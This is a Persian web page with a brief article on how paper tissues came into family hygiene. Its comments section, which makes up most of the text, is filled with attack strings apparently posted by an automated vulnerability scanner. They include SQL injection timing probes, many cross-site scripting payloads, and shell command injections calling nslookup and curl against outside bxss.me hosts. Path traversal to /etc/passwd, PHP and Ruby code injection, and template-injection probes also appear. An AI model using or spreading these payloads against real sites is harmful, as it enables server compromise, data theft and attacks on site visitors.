محصولات
  Filters
  Preferences
  جستجو

  چگونگی پیدایش دستمال کاغذی در بهداشت خانواده

  چگونگی پیدایش دستمال کاغذی در بهداشت خانواده

  تاریخچه ی جایگاه دستمال در بهداشت خانواده
  در سال های دور، زمانی که هنوز پیشرفت های عظیم امروزی در صنعت و بهداشت عمومی و بهداشت خانواده به وجود نیامده بود. تمامی مردم برای رعایت بهداشت فردی، از دستمال های پارچه ای استفاده می کردند. به همراه داشتن دستمال های پارچه ای و چهارگوش برای همه ی افراد در هر محیطی امری عادی تلقی می شد. تا جایی که مردم برای تمامی کارهای خود از همان دستمال پارچه ای استفاده می کردند. از پاک کردن اشک چشم تا مخاط بینی و دهان. از پاک کردن دستان تا ابزار و وسایل مختلف. دستمالی که با دست و ابزار و وسایل مختلف در تماس بود، سپس در جیب فرد قرار می گرفت و چه بسا پس از مدتی کوتاه دوباره برای استفاده مجدد روی صورت و حتی چشم او قرار می گرفت و به دلیل پایین بودن سطح بهداشت و ناآگاهی در این زمینه، مردم حساسیت خاصی روی این موضوع نداشتند و با تماس دستمال های پارچه ای خود با سطوح آلوده ی مختلف و سپس سطح پوست و صورت مشکلی نداشتند.
  همه ی عواملی که در بالا ذکر شد حتما در شیوع بیماری های واگیردار در آن زمان ها تاثیرگذار بوده است. وقتی بهداشت خانواده به خوبی رعایت نشود در نتیجه بهداشت عمومی نیز به درستی رعایت نمی شود. لذا عدم رعایت بهداشت خانواده و فردی به گسترش فراگیر و سریع بیماری های مسری کمک می کرد.

  کشف راه های انتقال بیماری های واگیردار و اختراع دستمال کاغذی
  رفته رفته با پیشرفت علم و بهداشت راه های انتقال بیماری های واگیردار و عفونی کشف شد. امروزه همه می دانیم تماس مستقیم و غیر مستقیم با سطوح آلوده از جمله ی راه های انتقال این بیماری ها می باشند. با افزایش سطح آگاهی و بهداشت عمومی و بهداشت خانواده، پزشکان و افراد آگاه متوجه این موضوع شدند که دیگر استفاده از دستمال های پارچه ای قدیمی راه مناسبی برای پاکیزگی فردی نمی باشد، چرا که نحوه ی استفاده از آن ها دقیقا باعث تماس های مستقیم و غیر مستقیم سطوح آلوده یا مخاط بینی و دهان فرد آلوده با دیگر سطوح می شد. لذا تولیدکنندگان باید به فکر تولید محصولی جدید برای رفع این نیاز مردم می بودند.

  نظرات
  1402/04/28 19:44
  555
  1402/04/28 19:47
  1BvP8cpbENO
  1402/04/28 19:47
  response.write(9177813*9944862)
  1402/04/28 19:47
  echo syuasc$()\ vcvwhr\nz^xyu||a #' &echo syuasc$()\ vcvwhr\nz^xyu||a #|" &echo syuasc$()\ vcvwhr\nz^xyu||a #
  1402/04/28 19:47
  '+response.write(9177813*9944862)+'
  1402/04/28 19:47
  &echo ahskft$()\ xlirsi\nz^xyu||a #' &echo ahskft$()\ xlirsi\nz^xyu||a #|" &echo ahskft$()\ xlirsi\nz^xyu||a #
  1402/04/28 19:47
  LWToNUEg
  1402/04/28 19:47
  |echo yyhsdp$()\ ivtqkv\nz^xyu||a #' |echo yyhsdp$()\ ivtqkv\nz^xyu||a #|" |echo yyhsdp$()\ ivtqkv\nz^xyu||a #
  1402/04/28 19:47
  (nslookup -q=cname hitsisvzrhwjh3b960.bxss.me||curl hitsisvzrhwjh3b960.bxss.me))
  1402/04/28 19:47
  ../../../../../../../../../../../../../../etc/passwd
  1402/04/28 19:47
  $(nslookup -q=cname hittdcoiwksst6de0b.bxss.me||curl hittdcoiwksst6de0b.bxss.me)
  1402/04/28 19:47
  555
  bcc:074625.447-229358.447.77009.19557.2@bxss.me
  1402/04/28 19:47
  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/28 19:47
  &nslookup -q=cname hitxveoictrprc903c.bxss.me&'\"`0&nslookup -q=cname hitxveoictrprc903c.bxss.me&`'
  1402/04/28 19:47
  to@example.com>
  bcc:074625.447-229359.447.77009.19557.2@bxss.me
  1402/04/28 19:47
  file:///etc/passwd
  1402/04/28 19:47
  &(nslookup -q=cname hityankziitmr1cc8b.bxss.me||curl hityankziitmr1cc8b.bxss.me)&'\"`0&(nslookup -q=cname hityankziitmr1cc8b.bxss.me||curl hityankziitmr1cc8b.bxss.me)&`'
  1402/04/28 19:47
  555
  1402/04/28 19:47
  "+response.write(9177813*9944862)+"
  1402/04/28 19:47
  |(nslookup -q=cname hitxjmlaxitig6ba93.bxss.me||curl hitxjmlaxitig6ba93.bxss.me)
  1402/04/28 19:47
  ../555
  1402/04/28 19:47
  555
  1402/04/28 19:47
  `(nslookup -q=cname hitnrybnlqlwl1ff63.bxss.me||curl hitnrybnlqlwl1ff63.bxss.me)`
  1402/04/28 19:47
  12345'"\'\");|]*{
  <>%BF''💡
  1402/04/28 19:47
  ;(nslookup -q=cname hitasgbuqthmu94f8b.bxss.me||curl hitasgbuqthmu94f8b.bxss.me)|(nslookup -q=cname hitasgbuqthmu94f8b.bxss.me||curl hitasgbuqthmu94f8b.bxss.me)&(nslookup -q=cname hitasgbuqthmu94f8b.bxss.me||curl hitasgbuqthmu94f8b.bxss.me)
  1402/04/28 19:47
  555
  1402/04/28 19:47
  555
  1402/04/28 19:47
  555<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/28 19:47
  ${10000494+10000032}
  1402/04/28 19:47
  555
  1402/04/28 19:47
  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  1402/04/28 19:47
  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  1402/04/28 19:47
  555&n946095=v938865
  1402/04/28 19:47
  Http://bxss.me/t/fit.txt
  1402/04/28 19:47
  http://bxss.me/t/fit.txt?.jpg
  1402/04/28 19:47
  /etc/shells
  1402/04/28 19:47
  c:/windows/win.ini
  1402/04/28 19:47
  bxss.me
  1402/04/28 19:47
  555
  1402/04/28 19:47
  )
  1402/04/28 19:47
  555
  1402/04/28 19:47
  !(()&&!|*|*|
  1402/04/28 19:47
  ^(#$!@#$)(()))******
  1402/04/28 19:47
  555
  1402/04/28 19:47
  555
  1402/04/28 19:47
  '.gethostbyname(lc('hitpp'.'qxqcvqct250c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(72).chr(118).chr(66).'
  1402/04/28 19:47
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/28 19:47
  ".gethostbyname(lc("hitcd"."rnvxiipf6ba71.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(76).chr(110).chr(68)."
  1402/04/28 19:47
  ';print(md5(31337));$a='
  1402/04/28 19:47
  ";print(md5(31337));$a="
  1402/04/28 19:47
  ${@print(md5(31337))}
  1402/04/28 19:47
  ${@print(md5(31337))}\
  1402/04/28 19:47
  '.print(md5(31337)).'
  1402/04/28 19:47
  555
  1402/04/28 19:47
  HttP://bxss.me/t/xss.html?%00
  1402/04/28 19:47
  bxss.me/t/xss.html?%00
  1402/04/28 19:47
  '"()
  1402/04/28 19:47
  555'&&sleep(27*1000)*nsudqd&&'
  1402/04/28 19:47
  "+"A".concat(70-3).concat(22*4).concat(113).concat(75).concat(116).concat(68)+(require"socket"
  Socket.gethostbyname("hitkg"+"ucnlbejt1a7e5.bxss.me.")[3].to_s)+"
  1402/04/28 19:47
  555"&&sleep(27*1000)*klwkvh&&"
  1402/04/28 19:47
  '+'A'.concat(70-3).concat(22*4).concat(99).concat(69).concat(119).concat(74)+(require'socket'
  Socket.gethostbyname('hitpp'+'akyaczopdf55d.bxss.me.')[3].to_s)+'
  1402/04/28 19:47
  555'||sleep(27*1000)*jnszve||'
  1402/04/28 19:47
  555"||sleep(27*1000)*nvvnqm||"
  1402/04/28 19:47
  555
  1402/04/28 19:47
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/28 19:47
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/28 19:47
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/28 19:47
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87/.
  1402/04/28 19:47
  555
  1402/04/28 19:47
  xfs.bxss.me
  1402/04/28 19:47
  555
  1402/04/28 19:47
  555
  1402/04/28 19:47
  '"
  1402/04/28 19:47
  -1 OR 2+660-660-1=0+0+0+1 --
  1402/04/28 19:47
  555'"()&%<zzz><ScRiPt >XHPR(9471)</ScRiPt>
  1402/04/28 19:47
  <!--
  1402/04/28 19:47
  -1 OR 2+622-622-1=0+0+0+1
  1402/04/28 19:47
  -1' OR 2+32-32-1=0+0+0+1 --
  1402/04/28 19:47
  -1' OR 2+790-790-1=0+0+0+1 or 'iTuUsjoc'='
  1402/04/28 19:47
  '"()&%<zzz><ScRiPt >XHPR(9698)</ScRiPt>
  1402/04/28 19:47
  555
  1402/04/28 19:47
  -1" OR 2+931-931-1=0+0+0+1 --
  1402/04/28 19:47
  5559360534
  1402/04/28 19:47
  555
  1402/04/28 19:47
  bfg1724<s1﹥s2ʺs3ʹhjl1724
  1402/04/28 19:47
  555
  1402/04/28 19:47
  bfgx1951%C0%BEz1%C0%BCz2a%90bcxhjl1951
  1402/04/28 19:47
  555
  1402/04/28 19:47
  555
  1402/04/28 19:47
  <%={{={@{#{${dfb}}%>
  1402/04/28 19:47
  <th:t="${dfb}#foreach
  1402/04/28 19:47
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/28 19:47
  dfb{{98991*97996}}xca
  1402/04/28 19:47
  dfb[[${98991*97996}]]xca
  1402/04/28 19:47
  dfb__${98991*97996}__::.x
  1402/04/28 19:47
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/28 19:47
  if(now()=sysdate(),sleep(15),0)
  1402/04/28 19:47
  555<ScRiPt >XHPR(9619)</ScRiPt>
  1402/04/28 19:47
  555<WSDDPU>AGYVO[!+!]</WSDDPU>
  1402/04/28 19:47
  555<script>XHPR(9607)</script>
  1402/04/28 19:47
  555<ScR<ScRiPt>IpT>XHPR(9144)</sCr<ScRiPt>IpT>
  1402/04/28 19:47
  555<ScRiPt
  >XHPR(9537)</ScRiPt>
  1402/04/28 19:47
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9508></ScRiPt>
  1402/04/28 19:47
  555<ScRiPt
  >XHPR(9709)</ScRiPt>
  1402/04/28 19:47
  555<svg  

  %A0onload=XHPR(9336);>
  1402/04/28 19:47
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/28 19:47
  555<isindex type=image src=1 onerror=XHPR(9147)>
  1402/04/28 19:47
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9536'>
  1402/04/28 19:47
  555<body onload=XHPR(9878)>
  1402/04/28 19:47
  555<img src=//xss.bxss.me/t/dot.gif onload=XHPR(9263)>
  1402/04/28 19:47
  555<img src=xyz OnErRor=XHPR(9631)>
  1402/04/28 19:47
  555<img/src=">" onerror=alert(9289)>
  1402/04/28 19:48
  %35%35%35%3C%53%63%52%69%50%74%20%3E%58%48%50%52%289879%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/28 19:48
  555\u003CScRiPt\XHPR(9287)\u003C/sCripT\u003E
  1402/04/28 19:48
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/28 19:48
  555&lt;ScRiPt&gt;XHPR(9664)&lt;/sCripT&gt;
  1402/04/28 19:48
  %F6<img zzz onmouseover=XHPR(90971) //%F6>
  1402/04/28 19:48
  555<input autofocus onfocus=XHPR(9451)>
  1402/04/28 19:48
  <a HrEF=http://xss.bxss.me></a>
  1402/04/28 19:48
  <a HrEF=jaVaScRiPT:>
  1402/04/28 19:48
  555}body{zzz:Expre/**/SSion(XHPR(9865))}
  1402/04/28 19:48
  555QZg4q
  <ScRiPt >XHPR(9784)</ScRiPt>
  1402/04/28 19:48
  555<WFASJV>6DTS5[!+!]</WFASJV>
  1402/04/28 19:48
  555<ifRAme sRc=9475.com></IfRamE>
  1402/04/28 19:48
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/28 19:48
  555<ai9cPrT x=9518>
  1402/04/28 19:48
  555<img sRc='http://attacker-9693/log.php?
  1402/04/28 19:48
  555<aPRVn3F<
  1402/04/28 19:48
  555
  1402/04/28 19:48
  555
  1402/04/28 19:48
  -1; waitfor delay '0:0:15' --
  1402/04/28 19:48
  -1); waitfor delay '0:0:15' --
  1402/04/28 19:48
  1 waitfor delay '0:0:15' --
  1402/04/28 19:49
  8QpNp4S2'; waitfor delay '0:0:15' --
  1402/04/28 19:49
  -5 OR 831=(SELECT 831 FROM PG_SLEEP(15))--
  1402/04/28 19:49
  -5) OR 183=(SELECT 183 FROM PG_SLEEP(15))--
  1402/04/28 19:49
  -1)) OR 657=(SELECT 657 FROM PG_SLEEP(15))--
  1402/04/28 19:49
  HyqGs4nb' OR 663=(SELECT 663 FROM PG_SLEEP(15))--
  1402/04/28 19:49
  vOoXk5F0') OR 331=(SELECT 331 FROM PG_SLEEP(15))--
  1402/04/28 19:50
  kGELM282')) OR 573=(SELECT 573 FROM PG_SLEEP(15))--
  1402/04/28 19:50
  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  1402/04/28 19:50
  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/28 19:50
  1'"
  1402/04/28 19:50
  1%C0%A7%C0%A2%2527%2522
  1402/04/28 19:50
  @@Pp4yh
  1402/04/28 19:50
  555
  1402/04/28 19:50
  555
  1402/04/28 19:52
  555
  1402/04/28 19:52
  555
  1402/04/28 19:54
  555
  1402/04/28 20:05
  555
  1402/04/28 20:09
  555'"()&%<zzz><ScRiPt >uzIz(9431)</ScRiPt>
  1402/04/28 20:09
  response.write(9237700*9812300)
  1402/04/28 20:09
  jebUxmF7
  1402/04/28 20:09
  echo ehxdaw$()\ qsxmbh\nz^xyu||a #' &echo ehxdaw$()\ qsxmbh\nz^xyu||a #|" &echo ehxdaw$()\ qsxmbh\nz^xyu||a #
  1402/04/28 20:09
  '+response.write(9237700*9812300)+'
  1402/04/28 20:09
  &echo dsmcos$()\ iumion\nz^xyu||a #' &echo dsmcos$()\ iumion\nz^xyu||a #|" &echo dsmcos$()\ iumion\nz^xyu||a #
  1402/04/28 20:09
  555
  1402/04/28 20:09
  "+response.write(9237700*9812300)+"
  1402/04/28 20:09
  |echo kcsgik$()\ zrmrkw\nz^xyu||a #' |echo kcsgik$()\ zrmrkw\nz^xyu||a #|" |echo kcsgik$()\ zrmrkw\nz^xyu||a #
  1402/04/28 20:09
  '"()&%<zzz><ScRiPt >uzIz(9182)</ScRiPt>
  1402/04/28 20:09
  (nslookup -q=cname hitumewclmtxp1ecb1.bxss.me||curl hitumewclmtxp1ecb1.bxss.me))
  1402/04/28 20:09
  $(nslookup -q=cname hitqjtejmdxqd1acc2.bxss.me||curl hitqjtejmdxqd1acc2.bxss.me)
  1402/04/28 20:09
  &nslookup -q=cname hitbybnenqzwh7aa75.bxss.me&'\"`0&nslookup -q=cname hitbybnenqzwh7aa75.bxss.me&`'
  1402/04/28 20:09
  &(nslookup -q=cname hitgjrqkzzeymf0f87.bxss.me||curl hitgjrqkzzeymf0f87.bxss.me)&'\"`0&(nslookup -q=cname hitgjrqkzzeymf0f87.bxss.me||curl hitgjrqkzzeymf0f87.bxss.me)&`'
  1402/04/28 20:09
  ../../../../../../../../../../../../../../etc/passwd
  1402/04/28 20:09
  |(nslookup -q=cname hitrtjgnaxfllc60f3.bxss.me||curl hitrtjgnaxfllc60f3.bxss.me)
  1402/04/28 20:09
  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/28 20:09
  555
  1402/04/28 20:09
  `(nslookup -q=cname hitpmuvvtpukd82e4e.bxss.me||curl hitpmuvvtpukd82e4e.bxss.me)`
  1402/04/28 20:09
  file:///etc/passwd
  1402/04/28 20:09
  ;(nslookup -q=cname hitkcucnzmofc4f9c8.bxss.me||curl hitkcucnzmofc4f9c8.bxss.me)|(nslookup -q=cname hitkcucnzmofc4f9c8.bxss.me||curl hitkcucnzmofc4f9c8.bxss.me)&(nslookup -q=cname hitkcucnzmofc4f9c8.bxss.me||curl hitkcucnzmofc4f9c8.bxss.me)
  1402/04/28 20:09
  5559023397
  1402/04/28 20:09
  555
  1402/04/28 20:09
  ../555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  bcc:074625.447-248657.447.77009.19557.2@bxss.me
  1402/04/28 20:09
  to@example.com>
  bcc:074625.447-248658.447.77009.19557.2@bxss.me
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  ${9999126+10000393}
  1402/04/28 20:09
  12345'"\'\");|]*{
  <>%BF''💡
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  1402/04/28 20:09
  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  1402/04/28 20:09
  Http://bxss.me/t/fit.txt
  1402/04/28 20:09
  http://bxss.me/t/fit.txt?.jpg
  1402/04/28 20:09
  /etc/shells
  1402/04/28 20:09
  c:/windows/win.ini
  1402/04/28 20:09
  bxss.me
  1402/04/28 20:09
  555&n910450=v901412
  1402/04/28 20:09
  555
  1402/04/28 20:09
  )
  1402/04/28 20:09
  !(()&&!|*|*|
  1402/04/28 20:09
  ^(#$!@#$)(()))******
  1402/04/28 20:09
  555
  1402/04/28 20:09
  '.gethostbyname(lc('hitiv'.'fdympcoqd0cc4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(67).chr(111).chr(87).'
  1402/04/28 20:09
  555
  1402/04/28 20:09
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/28 20:09
  ".gethostbyname(lc("hitgv"."ohctwiji4a3e4.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(88).chr(106).chr(89)."
  1402/04/28 20:09
  ';print(md5(31337));$a='
  1402/04/28 20:09
  ";print(md5(31337));$a="
  1402/04/28 20:09
  ${@print(md5(31337))}
  1402/04/28 20:09
  ${@print(md5(31337))}\
  1402/04/28 20:09
  '.print(md5(31337)).'
  1402/04/28 20:09
  '"()
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555'&&sleep(27*1000)*idwjji&&'
  1402/04/28 20:09
  -1 OR 2+871-871-1=0+0+0+1 --
  1402/04/28 20:09
  -1 OR 2+469-469-1=0+0+0+1
  1402/04/28 20:09
  HttP://bxss.me/t/xss.html?%00
  1402/04/28 20:09
  -1' OR 2+942-942-1=0+0+0+1 --
  1402/04/28 20:09
  bxss.me/t/xss.html?%00
  1402/04/28 20:09
  555"&&sleep(27*1000)*sikrxv&&"
  1402/04/28 20:09
  -1' OR 2+195-195-1=0+0+0+1 or 'Z5Il7kX0'='
  1402/04/28 20:09
  -1" OR 2+832-832-1=0+0+0+1 --
  1402/04/28 20:09
  555'||sleep(27*1000)*pcqlbk||'
  1402/04/28 20:09
  "+"A".concat(70-3).concat(22*4).concat(114).concat(88).concat(120).concat(81)+(require"socket"
  Socket.gethostbyname("hitap"+"nlewqnzd0a235.bxss.me.")[3].to_s)+"
  1402/04/28 20:09
  '+'A'.concat(70-3).concat(22*4).concat(99).concat(81).concat(115).concat(72)+(require'socket'
  Socket.gethostbyname('hitxk'+'mvuwsbaz4bafb.bxss.me.')[3].to_s)+'
  1402/04/28 20:09
  555"||sleep(27*1000)*rjqyfw||"
  1402/04/28 20:09
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/28 20:09
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/28 20:09
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87/.
  1402/04/28 20:09
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  xfs.bxss.me
  1402/04/28 20:09
  '"
  1402/04/28 20:09
  <!--
  1402/04/28 20:09
  555'"()&%<zzz><ScRiPt >luVL(9798)</ScRiPt>
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  555
  1402/04/28 20:09
  '"()&%<zzz><ScRiPt >luVL(9657)</ScRiPt>
  1402/04/28 20:10
  5559863641
  1402/04/28 20:10
  bfg9400<s1﹥s2ʺs3ʹhjl9400
  1402/04/28 20:10
  if(now()=sysdate(),sleep(15),0)
  1402/04/28 20:10
  bfgx1472%C0%BEz1%C0%BCz2a%90bcxhjl1472
  1402/04/28 20:10
  <%={{={@{#{${dfb}}%>
  1402/04/28 20:10
  <th:t="${dfb}#foreach
  1402/04/28 20:10
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/28 20:10
  dfb{{98991*97996}}xca
  1402/04/28 20:10
  dfb[[${98991*97996}]]xca
  1402/04/28 20:10
  dfb__${98991*97996}__::.x
  1402/04/28 20:10
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/28 20:10
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/28 20:10
  555<ScRiPt >luVL(9120)</ScRiPt>
  1402/04/28 20:10
  555<WJD405>0K641[!+!]</WJD405>
  1402/04/28 20:10
  555<script>luVL(9486)</script>
  1402/04/28 20:10
  555<ScR<ScRiPt>IpT>luVL(9020)</sCr<ScRiPt>IpT>
  1402/04/28 20:10
  555<ScRiPt
  >luVL(9826)</ScRiPt>
  1402/04/28 20:10
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/28 20:10
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9232></ScRiPt>
  1402/04/28 20:10
  555<ScRiPt
  >luVL(9614)</ScRiPt>
  1402/04/28 20:10
  555<svg  

  %A0onload=luVL(9331);>
  1402/04/28 20:10
  555<isindex type=image src=1 onerror=luVL(9606)>
  1402/04/28 20:10
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9871'>
  1402/04/28 20:10
  555<body onload=luVL(9550)>
  1402/04/28 20:10
  555<img src=//xss.bxss.me/t/dot.gif onload=luVL(9066)>
  1402/04/28 20:10
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/28 20:10
  555<img src=xyz OnErRor=luVL(9907)>
  1402/04/28 20:10
  555<img/src=">" onerror=alert(9380)>
  1402/04/28 20:10
  %35%35%35%3C%53%63%52%69%50%74%20%3E%6C%75%56%4C%289927%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/28 20:10
  555\u003CScRiPt\luVL(9404)\u003C/sCripT\u003E
  1402/04/28 20:10
  555&lt;ScRiPt&gt;luVL(9718)&lt;/sCripT&gt;
  1402/04/28 20:10
  %F6<img zzz onmouseover=luVL(97671) //%F6>
  1402/04/28 20:10
  555<input autofocus onfocus=luVL(9116)>
  1402/04/28 20:10
  -1; waitfor delay '0:0:15' --
  1402/04/28 20:10
  <a HrEF=http://xss.bxss.me></a>
  1402/04/28 20:10
  <a HrEF=jaVaScRiPT:>
  1402/04/28 20:10
  555}body{zzz:Expre/**/SSion(luVL(9233))}
  1402/04/28 20:10
  55531gVx
  <ScRiPt >luVL(9892)</ScRiPt>
  1402/04/28 20:10
  555<W8OKUN>4U19E[!+!]</W8OKUN>
  1402/04/28 20:10
  555<ifRAme sRc=9571.com></IfRamE>
  1402/04/28 20:10
  555<aVhG4VE x=9409>
  1402/04/28 20:10
  555<img sRc='http://attacker-9364/log.php?
  1402/04/28 20:10
  -1); waitfor delay '0:0:15' --
  1402/04/28 20:10
  555<a15Jv0A<
  1402/04/28 20:10
  555
  1402/04/28 20:10
  555
  1402/04/28 20:10
  1 waitfor delay '0:0:15' --
  1402/04/28 20:11
  9czehDBc'; waitfor delay '0:0:15' --
  1402/04/28 20:11
  -5 OR 443=(SELECT 443 FROM PG_SLEEP(15))--
  1402/04/28 20:11
  -5) OR 538=(SELECT 538 FROM PG_SLEEP(15))--
  1402/04/28 20:11
  -1)) OR 136=(SELECT 136 FROM PG_SLEEP(15))--
  1402/04/28 20:11
  3hnyutKt' OR 909=(SELECT 909 FROM PG_SLEEP(15))--
  1402/04/28 20:11
  zfx5OikV') OR 616=(SELECT 616 FROM PG_SLEEP(15))--
  1402/04/28 20:11
  WbYc8YwZ')) OR 65=(SELECT 65 FROM PG_SLEEP(15))--
  1402/04/28 20:12
  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  1402/04/28 20:12
  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/28 20:12
  1'"
  1402/04/28 20:12
  1%C0%A7%C0%A2%2527%2522
  1402/04/28 20:12
  @@NqWmw
  1402/04/28 20:12
  555
  1402/04/28 20:12
  555
  1402/04/28 20:14
  555
  1402/04/28 20:23
  555
  1402/04/28 20:26
  555'"()&%<zzz><ScRiPt >XvF4(9671)</ScRiPt>
  1402/04/28 20:26
  response.write(9093371*9547652)
  1402/04/28 20:26
  '+response.write(9093371*9547652)+'
  1402/04/28 20:26
  "+response.write(9093371*9547652)+"
  1402/04/28 20:26
  555
  1402/04/28 20:26
  echo mpvode$()\ nbywcc\nz^xyu||a #' &echo mpvode$()\ nbywcc\nz^xyu||a #|" &echo mpvode$()\ nbywcc\nz^xyu||a #
  1402/04/28 20:26
  '"()&%<zzz><ScRiPt >XvF4(9399)</ScRiPt>
  1402/04/28 20:26
  &echo hrqivo$()\ skrhco\nz^xyu||a #' &echo hrqivo$()\ skrhco\nz^xyu||a #|" &echo hrqivo$()\ skrhco\nz^xyu||a #
  1402/04/28 20:26
  TXEQRfBj
  1402/04/28 20:26
  |echo idyvzv$()\ clgrzc\nz^xyu||a #' |echo idyvzv$()\ clgrzc\nz^xyu||a #|" |echo idyvzv$()\ clgrzc\nz^xyu||a #
  1402/04/28 20:26
  (nslookup -q=cname hituivvsyrdgx50668.bxss.me||curl hituivvsyrdgx50668.bxss.me))
  1402/04/28 20:26
  $(nslookup -q=cname hitjloiqjiokyebc41.bxss.me||curl hitjloiqjiokyebc41.bxss.me)
  1402/04/28 20:26
  &nslookup -q=cname hitrgudegsyum24d21.bxss.me&'\"`0&nslookup -q=cname hitrgudegsyum24d21.bxss.me&`'
  1402/04/28 20:26
  555
  1402/04/28 20:26
  &(nslookup -q=cname hitknrrvvbvysd4310.bxss.me||curl hitknrrvvbvysd4310.bxss.me)&'\"`0&(nslookup -q=cname hitknrrvvbvysd4310.bxss.me||curl hitknrrvvbvysd4310.bxss.me)&`'
  1402/04/28 20:26
  |(nslookup -q=cname hitlflgtovlmy13bac.bxss.me||curl hitlflgtovlmy13bac.bxss.me)
  1402/04/28 20:26
  5559100898
  1402/04/28 20:26
  555
